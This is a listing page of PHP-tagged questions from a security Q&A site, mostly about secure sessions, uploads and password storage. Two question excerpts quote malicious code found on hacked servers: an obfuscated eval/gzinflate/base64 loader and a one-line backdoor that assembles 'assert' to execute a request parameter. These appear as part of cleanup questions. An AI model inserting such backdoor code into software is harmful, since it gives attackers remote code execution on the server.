Questions tagged [php]

Security aspects concerning code written in the programming language PHP which is often used for web applications.

1619 questions
38
votes
1 answer

default.php file found on the server, is this a security threat?

I found a file named "default.php" on the server with following code eval(gzinflate(base64_decode( …
Vaibhav
  • 483
  • 4
  • 5
18
votes
3 answers

Creating Secure PHP Sessions

I have already created and refined both registration and login systems, However I am lead to believe the tricky part comes when you are creating a session. As far as I know this is due to both Hijacking and fixation. Which in all honesty I don't…
TuKritical
  • 361
  • 1
  • 3
  • 5
18
votes
2 answers

What does this suspicious PHP code do?

I'm cleaning up a website after an attack which resulted in many PHP shells being uploaded. I've found and removed the following code: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } Could you tell me what it does? How…
user136206
  • 189
  • 1
  • 3
11
votes
2 answers

Obfuscated php code found on the server

I found this piece of code hosted on my website I'm sure it's a malware. Any have an idea what this script does or how to deobfuscate?
calculataur
  • 115
  • 5
9
votes
2 answers

Is it possible to disable all PHP functions not used in my application?

I want to secure my PHP installation. I can disable some functions, like system(), exec() etc using disable_functions in php.ini. But I can forget to disable some dangerous functions. Is it possible to disable all functions, excluding the ones…
checkbox
  • 91
  • 3
8
votes
3 answers

CLI API that requires plaintext user details

I've been tasked with writing a module for my company to interface with an external API. This API has a syntax similar to SSH where I have to incorporate the user details as well as the host address of the server I'm trying to connect to. …
Max
  • 81
  • 2
8
votes
2 answers

Secure PHP upload form & storage

I am building a PHP application that allows uploads of files (.doc/pdf etc) for review by a staff member. Some of these files will be somewhat confidential so I need to protect them. Now the best solution would be to get the sender to encrypt these…
user350325
  • 183
  • 1
  • 4
8
votes
3 answers

Starting a secure php session

I have been looking into creating secure php sessions for use in a login script for a week or so now. So far I have not found a concrete resource to base my work off, reading StackOverflow all I have seen is mixed views and opinions. I decided to…
TuKritical
  • 361
  • 1
  • 3
  • 5
7
votes
3 answers

DB Passwords: More Secure in a PHP App's .ini config files or apache2 environment variables?

I manage a php app whose key variables (such as database server addresses, DB user names and passwords, etc) change depending on their environment (Dev, QA, Production, etc.). In order to simplify deployment, I have started moving some environment…
6
votes
4 answers

What security features should a PHP framework have?

What security features would you find useful or expect from a PHP framework? I have a PHP framework that I've developed that I'm going to be releasing as an open source project, but I want to make sure that it has appropriate security features. Here…
VirtuosiMedia
  • 3,242
  • 3
  • 28
  • 32
6
votes
2 answers

How to safely display external pictures?

i want to write (and currently writing) a php script to display external images, not hosted on my website. Something like facebook's safe_image. What I'm currently doing is file_get_contents('pic') (or curl) the url and checking for httpcode and…
GodHand
  • 63
  • 1
  • 4
6
votes
3 answers

PHP crypt() or phpass for storing passwords?

When storing passwords, should I use PHP's built in crypt or phpass? If using crypt, should I use CRYPT_SHA512 or CRYPT_BLOWFISH?
willwill
  • 505
  • 5
  • 9
6
votes
2 answers

Why don't we use MAC address instead of IP address?

I can use the system function in PHP to get the MAC address of site visitors (probably most of you know). Why do we use IP addresss to check whether someone is stealing a cookie or not? Does the system function have more overhead, or is it still…
Alireza
  • 1,310
  • 1
  • 20
  • 26
5
votes
3 answers

Can I limit PHP include() to specific directory trees?

I know I can use the php.ini open_basedir directive to limit the directory trees where files can be opened by PHP. But in a directory structure such as this: ├── application │   ├── index.php │   └── www ├── logs └── uploads └──…
Aaron Adams
  • 153
  • 5
5
votes
3 answers

Security risks using tmpfile() for sensitive data in PHP

What are the primary concerns when storing sensitive data in PHP's temporary directory via tmpfile()? For instance: Could this data be recovered from HDD by a malicious admin? Could the admin easily change the tmp directory to a permanent storage…
Sam Tuke
  • 153
  • 6
1
2 3 4 5 6 7